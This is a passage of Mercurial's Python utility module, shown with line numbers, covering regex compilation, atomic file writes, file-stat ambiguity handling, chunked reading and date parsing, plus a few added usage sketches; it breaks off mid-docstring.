1357 1354 _re2 = None
1358 1355 except ImportError:
1359 1356 _re2 = False
1360 1357
1361 1358 class _re(object):
1362 1359 def _checkre2(self):
1363 1360 global _re2
1364 1361 try:
1365 1362 # check if match works, see issue3964
1366 1363 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1367 1364 except ImportError:
1368 1365 _re2 = False
1369 1366
1370 1367 def compile(self, pat, flags=0):
1371 1368 '''Compile a regular expression, using re2 if possible
1372 1369
1373 1370 For best performance, use only re2-compatible regexp features. The
1374 1371 only flags from the re module that are re2-compatible are
1375 1372 IGNORECASE and MULTILINE.'''
1376 1373 if _re2 is None:
1377 1374 self._checkre2()
1378 1375 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1379 1376 if flags & remod.IGNORECASE:
1380 1377 pat = '(?i)' + pat
1381 1378 if flags & remod.MULTILINE:
1382 1379 pat = '(?m)' + pat
1383 1380 try:
1384 1381 return re2.compile(pat)
1385 1382 except re2.error:
1386 1383 pass
1387 1384 return remod.compile(pat, flags)
1388 1385
1389 1386 @propertycache
1390 1387 def escape(self):
1391 1388 '''Return the version of escape corresponding to self.compile.
1392 1389
1393 1390 This is imperfect because whether re2 or re is used for a particular
1394 1391 function depends on the flags, etc, but it's the best we can do.
1395 1392 '''
1396 1393 global _re2
1397 1394 if _re2 is None:
1398 1395 self._checkre2()
1399 1396 if _re2:
1400 1397 return re2.escape
1401 1398 else:
1402 1399 return remod.escape
1403 1400
1404 1401 re = _re()
1405 1402
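# Sketch (not part of the original source): callers compile through util.re so
# re2 is used transparently when available; IGNORECASE/MULTILINE are forwarded
# as inline (?i)/(?m) flags, anything else falls back to the stdlib re module.
def _demorecompile():
    pat = re.compile(br'^[a-f0-9]+$', remod.IGNORECASE)
    return bool(pat.match(b'DEADBEEF'))  # True: (?i) covers the class
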
1406 1403 _fspathcache = {}
1407 1404 def fspath(name, root):
1408 1405 '''Get name in the case stored in the filesystem
1409 1406
1410 1407 The name should be relative to root, and be normcase-ed for efficiency.
1411 1408
1412 1409 Note that this function is unnecessary, and should not be
1413 1410 called, for case-sensitive filesystems (simply because it's expensive).
1414 1411
1415 1412 The root should be normcase-ed, too.
1416 1413 '''
1417 1414 def _makefspathcacheentry(dir):
1418 1415 return dict((normcase(n), n) for n in os.listdir(dir))
1419 1416
1420 1417 seps = pycompat.ossep
1421 1418 if pycompat.osaltsep:
1422 1419 seps = seps + pycompat.osaltsep
1423 1420 # Protect backslashes. This gets silly very quickly.
1424 1421 seps = seps.replace('\\', '\\\\')  # str.replace is not in-place; keep the result
1425 1422 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1426 1423 dir = os.path.normpath(root)
1427 1424 result = []
1428 1425 for part, sep in pattern.findall(name):
1429 1426 if sep:
1430 1427 result.append(sep)
1431 1428 continue
1432 1429
1433 1430 if dir not in _fspathcache:
1434 1431 _fspathcache[dir] = _makefspathcacheentry(dir)
1435 1432 contents = _fspathcache[dir]
1436 1433
1437 1434 found = contents.get(part)
1438 1435 if not found:
1439 1436 # retry "once per directory" per "dirstate.walk", which
1440 1437 # may take place for each patch of "hg qpush", for example
1441 1438 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1442 1439 found = contents.get(part)
1443 1440
1444 1441 result.append(found or part)
1445 1442 dir = os.path.join(dir, part)
1446 1443
1447 1444 return ''.join(result)
1448 1445
1449 1446 def getfstype(dirpath):
1450 1447 '''Get the filesystem type name from a directory (best-effort)
1451 1448
1452 1449 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1453 1450 '''
1454 1451 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1455 1452
1456 1453 def checknlink(testfile):
1457 1454 '''check whether hardlink count reporting works properly'''
1458 1455
1459 1456 # testfile may be open, so we need a separate file for checking to
1460 1457 # work around issue2543 (or testfile may get lost on Samba shares)
1461 1458 f1 = testfile + ".hgtmp1"
1462 1459 if os.path.lexists(f1):
1463 1460 return False
1464 1461 try:
1465 1462 posixfile(f1, 'w').close()
1466 1463 except IOError:
1467 1464 try:
1468 1465 os.unlink(f1)
1469 1466 except OSError:
1470 1467 pass
1471 1468 return False
1472 1469
1473 1470 f2 = testfile + ".hgtmp2"
1474 1471 fd = None
1475 1472 try:
1476 1473 oslink(f1, f2)
1477 1474 # nlinks() may behave differently for files on Windows shares if
1478 1475 # the file is open.
1479 1476 fd = posixfile(f2)
1480 1477 return nlinks(f2) > 1
1481 1478 except OSError:
1482 1479 return False
1483 1480 finally:
1484 1481 if fd is not None:
1485 1482 fd.close()
1486 1483 for f in (f1, f2):
1487 1484 try:
1488 1485 os.unlink(f)
1489 1486 except OSError:
1490 1487 pass
1491 1488
1492 1489 def endswithsep(path):
1493 1490 '''Check path ends with os.sep or os.altsep.'''
1494 1491 return (path.endswith(pycompat.ossep)
1495 1492 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1496 1493
1497 1494 def splitpath(path):
1498 1495 '''Split path by os.sep.
1499 1496 Note that this function does not use os.altsep because it is
1500 1497 meant as a simple alternative to "xxx.split(os.sep)".
1501 1498 It is recommended to apply os.path.normpath() before using this
1502 1499 function if needed.'''
1503 1500 return path.split(pycompat.ossep)
1504 1501
1505 1502 def gui():
1506 1503 '''Are we running in a GUI?'''
1507 1504 if pycompat.sysplatform == 'darwin':
1508 1505 if 'SSH_CONNECTION' in encoding.environ:
1509 1506 # handle SSH access to a box where the user is logged in
1510 1507 return False
1511 1508 elif getattr(osutil, 'isgui', None):
1512 1509 # check if a CoreGraphics session is available
1513 1510 return osutil.isgui()
1514 1511 else:
1515 1512 # pure build; use a safe default
1516 1513 return True
1517 1514 else:
1518 1515 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1519 1516
1520 1517 def mktempcopy(name, emptyok=False, createmode=None):
1521 1518 """Create a temporary file with the same contents from name
1522 1519
1523 1520 The permission bits are copied from the original file.
1524 1521
1525 1522 If the temporary file is going to be truncated immediately, you
1526 1523 can use emptyok=True as an optimization.
1527 1524
1528 1525 Returns the name of the temporary file.
1529 1526 """
1530 1527 d, fn = os.path.split(name)
1531 1528 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1532 1529 os.close(fd)
1533 1530 # Temporary files are created with mode 0600, which is usually not
1534 1531 # what we want. If the original file already exists, just copy
1535 1532 # its mode. Otherwise, manually obey umask.
1536 1533 copymode(name, temp, createmode)
1537 1534 if emptyok:
1538 1535 return temp
1539 1536 try:
1540 1537 try:
1541 1538 ifp = posixfile(name, "rb")
1542 1539 except IOError as inst:
1543 1540 if inst.errno == errno.ENOENT:
1544 1541 return temp
1545 1542 if not getattr(inst, 'filename', None):
1546 1543 inst.filename = name
1547 1544 raise
1548 1545 ofp = posixfile(temp, "wb")
1549 1546 for chunk in filechunkiter(ifp):
1550 1547 ofp.write(chunk)
1551 1548 ifp.close()
1552 1549 ofp.close()
1553 1550 except: # re-raises
1554 1551 try: os.unlink(temp)
1555 1552 except OSError: pass
1556 1553 raise
1557 1554 return temp
1558 1555
1559 1556 class filestat(object):
1560 1557 """help to exactly detect change of a file
1561 1558
1562 1559 The 'stat' attribute is the result of 'os.stat()' if the specified
1563 1560 'path' exists, and None otherwise. This spares callers of this
1564 1561 class a separate preparatory 'exists()' check.
1565 1562 """
1566 1563 def __init__(self, stat):
1567 1564 self.stat = stat
1568 1565
1569 1566 @classmethod
1570 1567 def frompath(cls, path):
1571 1568 try:
1572 1569 stat = os.stat(path)
1573 1570 except OSError as err:
1574 1571 if err.errno != errno.ENOENT:
1575 1572 raise
1576 1573 stat = None
1577 1574 return cls(stat)
1578 1575
1579 1576 @classmethod
1580 1577 def fromfp(cls, fp):
1581 1578 stat = os.fstat(fp.fileno())
1582 1579 return cls(stat)
1583 1580
1584 1581 __hash__ = object.__hash__
1585 1582
1586 1583 def __eq__(self, old):
1587 1584 try:
1588 1585 # if ambiguity between stat of new and old file is
1589 1586 # avoided, comparison of size, ctime and mtime is enough
1590 1587 # to exactly detect change of a file regardless of platform
1591 1588 return (self.stat.st_size == old.stat.st_size and
1592 1589 self.stat.st_ctime == old.stat.st_ctime and
1593 1590 self.stat.st_mtime == old.stat.st_mtime)
1594 1591 except AttributeError:
1595 1592 pass
1596 1593 try:
1597 1594 return self.stat is None and old.stat is None
1598 1595 except AttributeError:
1599 1596 return False
1600 1597
1601 1598 def isambig(self, old):
1602 1599 """Examine whether new (= self) stat is ambiguous against old one
1603 1600
1604 1601 "S[N]" below means stat of a file at N-th change:
1605 1602
1606 1603 - S[n-1].ctime < S[n].ctime: can detect change of a file
1607 1604 - S[n-1].ctime == S[n].ctime
1608 1605 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1609 1606 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1610 1607 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1611 1608 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1612 1609
1613 1610 Case (*2) above means that a file was changed twice or more
1614 1611 within the same second (= S[n-1].ctime), so comparing
1615 1612 timestamps cannot tell the changes apart.
1616 1613
1617 1614 The basic idea for avoiding such ambiguity is "advance mtime by
1618 1615 1 second if the timestamp is ambiguous".
1619 1616
1620 1617 But advancing mtime only in case (*2) doesn't work as
1621 1618 expected, because a naturally advanced S[n].mtime in case (*1)
1622 1619 might be equal to a manually advanced S[n-1 or earlier].mtime.
1623 1620
1624 1621 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1625 1622 treated as ambiguous regardless of mtime, to avoid overlooking
1626 1623 a change masked by such an mtime collision.
1627 1624
1628 1625 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1629 1626 S[n].mtime", even if size of a file isn't changed.
1630 1627 """
1631 1628 try:
1632 1629 return (self.stat.st_ctime == old.stat.st_ctime)
1633 1630 except AttributeError:
1634 1631 return False
1635 1632
1636 1633 def avoidambig(self, path, old):
1637 1634 """Change file stat of specified path to avoid ambiguity
1638 1635
1639 1636 'old' should be previous filestat of 'path'.
1640 1637
1641 1638 If the process doesn't have appropriate privileges for 'path',
1642 1639 this skips avoiding ambiguity and returns False in that
1643 1640 case.
1644 1641
1645 1642 Otherwise, this returns True, as "ambiguity is avoided".
1646 1643 """
1647 1644 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1648 1645 try:
1649 1646 os.utime(path, (advanced, advanced))
1650 1647 except OSError as inst:
1651 1648 if inst.errno == errno.EPERM:
1652 1649 # utime() on the file created by another user causes EPERM,
1653 1650 # if a process doesn't have appropriate privileges
1654 1651 return False
1655 1652 raise
1656 1653 return True
1657 1654
1658 1655 def __ne__(self, other):
1659 1656 return not self == other
1660 1657
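# Sketch (not part of the original source): the write pattern the ambiguity
# machinery above supports -- snapshot the old stat, rewrite the file, then
# advance mtime when old and new ctime coincide. writefile() is defined below.
def _demoavoidambig(path, data):
    oldstat = filestat.frompath(path)
    writefile(path, data)
    newstat = filestat.frompath(path)
    if newstat.isambig(oldstat):
        # same ctime: bump mtime so later comparisons can see the change
        newstat.avoidambig(path, oldstat)
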
1661 1658 class atomictempfile(object):
1662 1659 '''writable file object that atomically updates a file
1663 1660
1664 1661 All writes will go to a temporary copy of the original file. Call
1665 1662 close() when you are done writing, and atomictempfile will rename
1666 1663 the temporary copy to the original name, making the changes
1667 1664 visible. If the object is destroyed without being closed, all your
1668 1665 writes are discarded.
1669 1666
1670 1667 The checkambig argument of the constructor is used with filestat,
1671 1668 and is useful only if the target file is guarded by a lock (e.g.
1672 1669 repo.lock or repo.wlock).
1673 1670 '''
1674 1671 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1675 1672 self.__name = name # permanent name
1676 1673 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1677 1674 createmode=createmode)
1678 1675 self._fp = posixfile(self._tempname, mode)
1679 1676 self._checkambig = checkambig
1680 1677
1681 1678 # delegated methods
1682 1679 self.read = self._fp.read
1683 1680 self.write = self._fp.write
1684 1681 self.seek = self._fp.seek
1685 1682 self.tell = self._fp.tell
1686 1683 self.fileno = self._fp.fileno
1687 1684
1688 1685 def close(self):
1689 1686 if not self._fp.closed:
1690 1687 self._fp.close()
1691 1688 filename = localpath(self.__name)
1692 1689 oldstat = self._checkambig and filestat.frompath(filename)
1693 1690 if oldstat and oldstat.stat:
1694 1691 rename(self._tempname, filename)
1695 1692 newstat = filestat.frompath(filename)
1696 1693 if newstat.isambig(oldstat):
1697 1694 # stat of changed file is ambiguous to original one
1698 1695 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1699 1696 os.utime(filename, (advanced, advanced))
1700 1697 else:
1701 1698 rename(self._tempname, filename)
1702 1699
1703 1700 def discard(self):
1704 1701 if not self._fp.closed:
1705 1702 try:
1706 1703 os.unlink(self._tempname)
1707 1704 except OSError:
1708 1705 pass
1709 1706 self._fp.close()
1710 1707
1711 1708 def __del__(self):
1712 1709 if safehasattr(self, '_fp'): # constructor actually did something
1713 1710 self.discard()
1714 1711
1715 1712 def __enter__(self):
1716 1713 return self
1717 1714
1718 1715 def __exit__(self, exctype, excvalue, traceback):
1719 1716 if exctype is not None:
1720 1717 self.discard()
1721 1718 else:
1722 1719 self.close()
1723 1720
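# Usage sketch (not part of the original source): all writes go to a temporary
# sibling of 'path'; the rename to 'path' happens only if the with-block exits
# cleanly, otherwise the temporary file is discarded.
def _demoatomicwrite(path, data):
    with atomictempfile(path, mode='wb', checkambig=True) as fp:
        fp.write(data)
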
1724 1721 def unlinkpath(f, ignoremissing=False):
1725 1722 """unlink and remove the directory if it is empty"""
1726 1723 if ignoremissing:
1727 1724 tryunlink(f)
1728 1725 else:
1729 1726 unlink(f)
1730 1727 # try removing directories that might now be empty
1731 1728 try:
1732 1729 removedirs(os.path.dirname(f))
1733 1730 except OSError:
1734 1731 pass
1735 1732
1736 1733 def tryunlink(f):
1737 1734 """Attempt to remove a file, ignoring ENOENT errors."""
1738 1735 try:
1739 1736 unlink(f)
1740 1737 except OSError as e:
1741 1738 if e.errno != errno.ENOENT:
1742 1739 raise
1743 1740
1744 1741 def makedirs(name, mode=None, notindexed=False):
1745 1742 """recursive directory creation with parent mode inheritance
1746 1743
1747 1744 Newly created directories are marked as "not to be indexed by
1748 1745 the content indexing service", if ``notindexed`` is specified
1749 1746 for "write" mode access.
1750 1747 """
1751 1748 try:
1752 1749 makedir(name, notindexed)
1753 1750 except OSError as err:
1754 1751 if err.errno == errno.EEXIST:
1755 1752 return
1756 1753 if err.errno != errno.ENOENT or not name:
1757 1754 raise
1758 1755 parent = os.path.dirname(os.path.abspath(name))
1759 1756 if parent == name:
1760 1757 raise
1761 1758 makedirs(parent, mode, notindexed)
1762 1759 try:
1763 1760 makedir(name, notindexed)
1764 1761 except OSError as err:
1765 1762 # Catch EEXIST to handle races
1766 1763 if err.errno == errno.EEXIST:
1767 1764 return
1768 1765 raise
1769 1766 if mode is not None:
1770 1767 os.chmod(name, mode)
1771 1768
1772 1769 def readfile(path):
1773 1770 with open(path, 'rb') as fp:
1774 1771 return fp.read()
1775 1772
1776 1773 def writefile(path, text):
1777 1774 with open(path, 'wb') as fp:
1778 1775 fp.write(text)
1779 1776
1780 1777 def appendfile(path, text):
1781 1778 with open(path, 'ab') as fp:
1782 1779 fp.write(text)
1783 1780
1784 1781 class chunkbuffer(object):
1785 1782 """Allow arbitrary sized chunks of data to be efficiently read from an
1786 1783 iterator over chunks of arbitrary size."""
1787 1784
1788 1785 def __init__(self, in_iter):
1789 1786 """in_iter is the iterator that's iterating over the input chunks."""
1790 1787 def splitbig(chunks):
1791 1788 for chunk in chunks:
1792 1789 if len(chunk) > 2**20:
1793 1790 pos = 0
1794 1791 while pos < len(chunk):
1795 1792 end = pos + 2 ** 18
1796 1793 yield chunk[pos:end]
1797 1794 pos = end
1798 1795 else:
1799 1796 yield chunk
1800 1797 self.iter = splitbig(in_iter)
1801 1798 self._queue = collections.deque()
1802 1799 self._chunkoffset = 0
1803 1800
1804 1801 def read(self, l=None):
1805 1802 """Read L bytes of data from the iterator of chunks of data.
1806 1803 Returns less than L bytes if the iterator runs dry.
1807 1804
1808 1805 If size parameter is omitted, read everything"""
1809 1806 if l is None:
1810 1807 return ''.join(self.iter)
1811 1808
1812 1809 left = l
1813 1810 buf = []
1814 1811 queue = self._queue
1815 1812 while left > 0:
1816 1813 # refill the queue
1817 1814 if not queue:
1818 1815 target = 2**18
1819 1816 for chunk in self.iter:
1820 1817 queue.append(chunk)
1821 1818 target -= len(chunk)
1822 1819 if target <= 0:
1823 1820 break
1824 1821 if not queue:
1825 1822 break
1826 1823
1827 1824 # The easy way to do this would be to queue.popleft(), modify the
1828 1825 # chunk (if necessary), then queue.appendleft(). However, for cases
1829 1826 # where we read partial chunk content, this incurs 2 dequeue
1830 1827 # mutations and creates a new str for the remaining chunk in the
1831 1828 # queue. Our code below avoids this overhead.
1832 1829
1833 1830 chunk = queue[0]
1834 1831 chunkl = len(chunk)
1835 1832 offset = self._chunkoffset
1836 1833
1837 1834 # Use full chunk.
1838 1835 if offset == 0 and left >= chunkl:
1839 1836 left -= chunkl
1840 1837 queue.popleft()
1841 1838 buf.append(chunk)
1842 1839 # self._chunkoffset remains at 0.
1843 1840 continue
1844 1841
1845 1842 chunkremaining = chunkl - offset
1846 1843
1847 1844 # Use all of the unconsumed part of the chunk.
1848 1845 if left >= chunkremaining:
1849 1846 left -= chunkremaining
1850 1847 queue.popleft()
1851 1848 # offset == 0 is enabled by block above, so this won't merely
1852 1849 # copy via ``chunk[0:]``.
1853 1850 buf.append(chunk[offset:])
1854 1851 self._chunkoffset = 0
1855 1852
1856 1853 # Partial chunk needed.
1857 1854 else:
1858 1855 buf.append(chunk[offset:offset + left])
1859 1856 self._chunkoffset += left
1860 1857 left -= chunkremaining
1861 1858
1862 1859 return ''.join(buf)
1863 1860
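# Sketch (not part of the original source): reads may straddle the incoming
# chunk boundaries; chunkbuffer re-slices them transparently.
def _demochunkbuffer():
    buf = chunkbuffer(iter(['abc', 'defg']))
    assert buf.read(2) == 'ab'    # partial first chunk
    assert buf.read(4) == 'cdef'  # spans the chunk boundary
    assert buf.read(10) == 'g'    # short read once the iterator runs dry
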
1864 1861 def filechunkiter(f, size=131072, limit=None):
1865 1862 """Create a generator that produces the data in the file size
1866 1863 (default 131072) bytes at a time, up to optional limit (default is
1867 1864 to read all data). Chunks may be less than size bytes if the
1868 1865 chunk is the last chunk in the file, or the file is a socket or
1869 1866 some other type of file that sometimes reads less data than is
1870 1867 requested."""
1871 1868 assert size >= 0
1872 1869 assert limit is None or limit >= 0
1873 1870 while True:
1874 1871 if limit is None:
1875 1872 nbytes = size
1876 1873 else:
1877 1874 nbytes = min(limit, size)
1878 1875 s = nbytes and f.read(nbytes)
1879 1876 if not s:
1880 1877 break
1881 1878 if limit:
1882 1879 limit -= len(s)
1883 1880 yield s
1884 1881
1885 1882 def makedate(timestamp=None):
1886 1883 '''Return a unix timestamp (or the current time) as a (unixtime,
1887 1884 offset) tuple based off the local timezone.'''
1888 1885 if timestamp is None:
1889 1886 timestamp = time.time()
1890 1887 if timestamp < 0:
1891 1888 hint = _("check your clock")
1892 1889 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1893 1890 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1894 1891 datetime.datetime.fromtimestamp(timestamp))
1895 1892 tz = delta.days * 86400 + delta.seconds
1896 1893 return timestamp, tz
1897 1894
1898 1895 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1899 1896 """represent a (unixtime, offset) tuple as a localized time.
1900 1897 unixtime is seconds since the epoch, and offset is the time zone's
1901 1898 number of seconds away from UTC.
1902 1899
1903 1900 >>> datestr((0, 0))
1904 1901 'Thu Jan 01 00:00:00 1970 +0000'
1905 1902 >>> datestr((42, 0))
1906 1903 'Thu Jan 01 00:00:42 1970 +0000'
1907 1904 >>> datestr((-42, 0))
1908 1905 'Wed Dec 31 23:59:18 1969 +0000'
1909 1906 >>> datestr((0x7fffffff, 0))
1910 1907 'Tue Jan 19 03:14:07 2038 +0000'
1911 1908 >>> datestr((-0x80000000, 0))
1912 1909 'Fri Dec 13 20:45:52 1901 +0000'
1913 1910 """
1914 1911 t, tz = date or makedate()
1915 1912 if "%1" in format or "%2" in format or "%z" in format:
1916 1913 sign = (tz > 0) and "-" or "+"
1917 1914 minutes = abs(tz) // 60
1918 1915 q, r = divmod(minutes, 60)
1919 1916 format = format.replace("%z", "%1%2")
1920 1917 format = format.replace("%1", "%c%02d" % (sign, q))
1921 1918 format = format.replace("%2", "%02d" % r)
1922 1919 d = t - tz
1923 1920 if d > 0x7fffffff:
1924 1921 d = 0x7fffffff
1925 1922 elif d < -0x80000000:
1926 1923 d = -0x80000000
1927 1924 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1928 1925 # because they use the gmtime() system call which is buggy on Windows
1929 1926 # for negative values.
1930 1927 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1931 1928 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1932 1929 return s
1933 1930
1934 1931 def shortdate(date=None):
1935 1932 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1936 1933 return datestr(date, format='%Y-%m-%d')
1937 1934
1938 1935 def parsetimezone(s):
1939 1936 """find a trailing timezone, if any, in string, and return a
1940 1937 (offset, remainder) pair"""
1941 1938
1942 1939 if s.endswith("GMT") or s.endswith("UTC"):
1943 1940 return 0, s[:-3].rstrip()
1944 1941
1945 1942 # Unix-style timezones [+-]hhmm
1946 1943 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1947 1944 sign = (s[-5] == "+") and 1 or -1
1948 1945 hours = int(s[-4:-2])
1949 1946 minutes = int(s[-2:])
1950 1947 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1951 1948
1952 1949 # ISO8601 trailing Z
1953 1950 if s.endswith("Z") and s[-2:-1].isdigit():
1954 1951 return 0, s[:-1]
1955 1952
1956 1953 # ISO8601-style [+-]hh:mm
1957 1954 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1958 1955 s[-5:-3].isdigit() and s[-2:].isdigit()):
1959 1956 sign = (s[-6] == "+") and 1 or -1
1960 1957 hours = int(s[-5:-3])
1961 1958 minutes = int(s[-2:])
1962 1959 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1963 1960
1964 1961 return None, s
1965 1962
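# Sketch (not part of the original source): the returned offset is in seconds,
# negated so that "unixtime = localunixtime + offset" holds (UTC+2 -> -7200).
def _demoparsetimezone():
    assert parsetimezone('2017-08-15 12:00 +0200') == (-7200, '2017-08-15 12:00')
    assert parsetimezone('12:00 GMT') == (0, '12:00')
    assert parsetimezone('12:00') == (None, '12:00')  # no zone found
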
1966 1963 def strdate(string, format, defaults=None):
1967 1964 """parse a localized time string and return a (unixtime, offset) tuple.
1968 1965 if the string cannot be parsed, ValueError is raised."""
1969 1966 if defaults is None:
1970 1967 defaults = {}
1971 1968
1972 1969 # NOTE: unixtime = localunixtime + offset
1973 1970 offset, date = parsetimezone(string)
1974 1971
1975 1972 # add missing elements from defaults
1976 1973 usenow = False # default to using biased defaults
1977 1974 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1978 1975 part = pycompat.bytestr(part)
1979 1976 found = [True for p in part if ("%"+p) in format]
1980 1977 if not found:
1981 1978 date += "@" + defaults[part][usenow]
1982 1979 format += "@%" + part[0]
1983 1980 else:
1984 1981 # We've found a specific time element; less specific time
1985 1982 # elements are relative to today
1986 1983 usenow = True
1987 1984
1988 1985 timetuple = time.strptime(encoding.strfromlocal(date),
1989 1986 encoding.strfromlocal(format))
1990 1987 localunixtime = int(calendar.timegm(timetuple))
1991 1988 if offset is None:
1992 1989 # local timezone
1993 1990 unixtime = int(time.mktime(timetuple))
1994 1991 offset = unixtime - localunixtime
1995 1992 else:
1996 1993 unixtime = localunixtime + offset
1997 1994 return unixtime, offset
1998 1995
1999 1996 def parsedate(date, formats=None, bias=None):
2000 1997 """parse a localized date/time and return a (unixtime, offset) tuple.
2001 1998
2002 1999 The date may be a "unixtime offset" string or in one of the specified
2003 2000 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2004 2001
2005 2002 >>> parsedate(' today ') == parsedate(\
2006 2003 datetime.date.today().strftime('%b %d'))
2007 2004 True
2008 2005 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2009 2006 datetime.timedelta(days=1)\
2010 2007 ).strftime('%b %d'))
2011 2008 True
2012 2009 >>> now, tz = makedate()
2013 2010 >>> strnow, strtz = parsedate('now')
2014 2011 >>> (strnow - now) < 1
2015 2012 True
2016 2013 >>> tz == strtz
2017 2014 True
2018 2015 """
2019 2016 if bias is None:
2020 2017 bias = {}
2021 2018 if not date:
2022 2019 return 0, 0
2023 2020 if isinstance(date, tuple) and len(date) == 2:
2024 2021 return date
2025 2022 if not formats:
2026 2023 formats = defaultdateformats
2027 2024 date = date.strip()
2028 2025
2029 2026 if date == 'now' or date == _('now'):
2030 2027 return makedate()
2031 2028 if date == 'today' or date == _('today'):
2032 2029 date = datetime.date.today().strftime('%b %d')
2033 2030 elif date == 'yesterday' or date == _('yesterday'):
2034 2031 date = (datetime.date.today() -
2035 2032 datetime.timedelta(days=1)).strftime('%b %d')
2036 2033
2037 2034 try:
2038 2035 when, offset = map(int, date.split(' '))
2039 2036 except ValueError:
2040 2037 # fill out defaults
2041 2038 now = makedate()
2042 2039 defaults = {}
2043 2040 for part in ("d", "mb", "yY", "HI", "M", "S"):
2044 2041 # this piece is for rounding the specific end of unknowns
2045 2042 b = bias.get(part)
2046 2043 if b is None:
2047 2044 if part[0:1] in "HMS":
2048 2045 b = "00"
2049 2046 else:
2050 2047 b = "0"
2051 2048
2052 2049 # this piece is for matching the generic end to today's date
2053 2050 n = datestr(now, "%" + part[0:1])
2054 2051
2055 2052 defaults[part] = (b, n)
2056 2053
2057 2054 for format in formats:
2058 2055 try:
2059 2056 when, offset = strdate(date, format, defaults)
2060 2057 except (ValueError, OverflowError):
2061 2058 pass
2062 2059 else:
2063 2060 break
2064 2061 else:
2065 2062 raise error.ParseError(_('invalid date: %r') % date)
2066 2063 # validate explicit (probably user-specified) date and
2067 2064 # time zone offset. values must fit in signed 32 bits for
2068 2065 # current 32-bit linux runtimes. timezones go from UTC-12
2069 2066 # to UTC+14
2070 2067 if when < -0x80000000 or when > 0x7fffffff:
2071 2068 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2072 2069 if offset < -50400 or offset > 43200:
2073 2070 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2074 2071 return when, offset
2075 2072
2076 2073 def matchdate(date):
2077 2074 """Return a function that matches a given date match specifier
2078 2075
2079 2076 Formats include:
2080 2077
2081 2078 '{date}' matches a given date to the accuracy provided
2082 2079
2083 2080 '<{date}' on or before a given date
2084 2081
2085 2082 '>{date}' on or after a given date
2086 2083
2087 2084 >>> p1 = parsedate("10:29:59")
2088 2085 >>> p2 = parsedate("10:30:00")
2089 2086 >>> p3 = parsedate("10:30:59")
2090 2087 >>> p4 = parsedate("10:31:00")
2091 2088 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2092 2089 >>> f = matchdate("10:30")
2093 2090 >>> f(p1[0])
2094 2091 False
2095 2092 >>> f(p2[0])
2096 2093 True
2097 2094 >>> f(p3[0])
2098 2095 True
2099 2096 >>> f(p4[0])
2100 2097 False
2101 2098 >>> f(p5[0])
2102 2099 False
2103 2100 """
2104 2101
2105 2102 def lower(date):
2106 2103 d = {'mb': "1", 'd': "1"}
2107 2104 return parsedate(date, extendeddateformats, d)[0]
2108 2105
2109 2106 def upper(date):
2110 2107 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2111 2108 for days in ("31", "30", "29"):
2112 2109 try:
2113 2110 d["d"] = days
2114 2111 return parsedate(date, extendeddateformats, d)[0]
2115 2112 except Abort:
2116 2113 pass
2117 2114 d["d"] = "28"
2118 2115 return parsedate(date, extendeddateformats, d)[0]
2119 2116
2120 2117 date = date.strip()
2121 2118
2122 2119 if not date:
2123 2120 raise Abort(_("dates cannot consist entirely of whitespace"))
2124 2121 elif date[0] == "<":
2125 2122 if not date[1:]:
2126 2123 raise Abort(_("invalid day spec, use '<DATE'"))
2127 2124 when = upper(date[1:])
2128 2125 return lambda x: x <= when
2129 2126 elif date[0] == ">":
2130 2127 if not date[1:]:
2131 2128 raise Abort(_("invalid day spec, use '>DATE'"))
2132 2129 when = lower(date[1:])
2133 2130 return lambda x: x >= when
2134 2131 elif date[0] == "-":
2135 2132 try:
2136 2133 days = int(date[1:])
2137 2134 except ValueError:
2138 2135 raise Abort(_("invalid day spec: %s") % date[1:])
2139 2136 if days < 0:
2140 2137 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2141 2138 % date[1:])
2142 2139 when = makedate()[0] - days * 3600 * 24
2143 2140 return lambda x: x >= when
2144 2141 elif " to " in date:
2145 2142 a, b = date.split(" to ")
2146 2143 start, stop = lower(a), upper(b)
2147 2144 return lambda x: x >= start and x <= stop
2148 2145 else:
2149 2146 start, stop = lower(date), upper(date)
2150 2147 return lambda x: x >= start and x <= stop
2151 2148
2152 2149 def stringmatcher(pattern, casesensitive=True):
2153 2150 """
2154 2151 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2155 2152 returns the matcher name, pattern, and matcher function.
2156 2153 missing or unknown prefixes are treated as literal matches.
2157 2154
2158 2155 helper for tests:
2159 2156 >>> def test(pattern, *tests):
2160 2157 ... kind, pattern, matcher = stringmatcher(pattern)
2161 2158 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2162 2159 >>> def itest(pattern, *tests):
